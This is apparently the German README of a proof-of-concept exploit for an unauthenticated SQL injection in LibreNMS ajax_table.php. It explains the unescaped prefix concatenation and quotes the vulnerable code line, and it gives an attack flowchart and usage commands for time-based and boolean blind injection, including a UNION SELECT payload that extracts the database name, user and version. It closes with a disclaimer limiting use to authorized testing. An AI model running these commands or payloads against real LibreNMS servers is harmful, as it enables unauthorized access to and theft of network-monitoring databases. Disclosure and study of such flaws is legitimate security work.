
Proof-of-Concept-Exploit für eine nicht authentifizierte SQL-Injection in LibreNMS ajax_table.php, das zeitbasierte und boolesche Blind-Injection-Techniken für autorisierte Sicherheitstests demonstriert.
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:NDer Parameter address wird bei search_type=ipv6 anhand von / in Adresse und Präfix aufgeteilt.
Der Präfix wird direkt ohne Escape in eine SQL-Abfrage eingefügt:
$sql .= " AND ipv6_prefixlen = '$prefix'";
Ein einfaches Anführungszeichen (') im Präfixteil ermöglicht das Ausbrechen aus dem String-Literal → beliebige SQL-Injection.
flowchart TD
A[Angreifer] -->|1. HTTP POST an /ajax_table.php| B[LibreNMS-Webserver]
B -->|2. id=address-search & search_type=ipv6| C[Parameter address parsen]
C -->|3. Aufteilung an '/' → $address / $prefix| D[Verwundbares SQL erstellen]
D -->|4. Verkettung: ipv6_prefixlen = '$prefix'| E[MySQL / MariaDB]
E -->|5. Injizierte Abfrage ausführen| F[Ergebnisse / Fehler / Verzögerung zurückgeben]
F -->|6. Angreifer beobachtet Antwort / Timing| A
subgraph "Injektionspunkt"
D
end
style D fill:#ff4d4d,stroke:#333,stroke-width:2px,color:#fff
requests (pip install requests)python3 exploit.py http://target/librenms --test
python3 exploit.py http://192.168.1.50/librenms --time
→ Wenn die Antwort >5–6 Sekunden dauert → verwundbar
python3 exploit.py http://target/librenms --boolean
python3 exploit.py http://target/librenms --test --payload "64' UNION SELECT database(),user(),version() -- "
exploit.py .............. Haupt-PoC-Skript (bei Bedarf von cve-2026-26988-poc.py umbenennen)README.md ............... Diese Datei15429580baba... → PR #18777Dieser Proof-of-Concept dient ausschließlich Bildungs- und autorisierten Sicherheitstestzwecken.
Verwenden Sie diesen Code NICHT gegen ein System oder Netzwerk ohne ausdrückliche schriftliche Genehmigung des Eigentümers.
Unbefugte Nutzung kann gegen Gesetze verstoßen, einschließlich (aber nicht beschränkt auf) den Computer Fraud and Abuse Act (CFAA) in den USA oder entsprechende Gesetze in Ihrem Land.
Nutzung auf eigene Gefahr.
Autor: Mohammed Idrees Banyamer
Instagram: @banyamer_security
Datum: 20. Februar 2026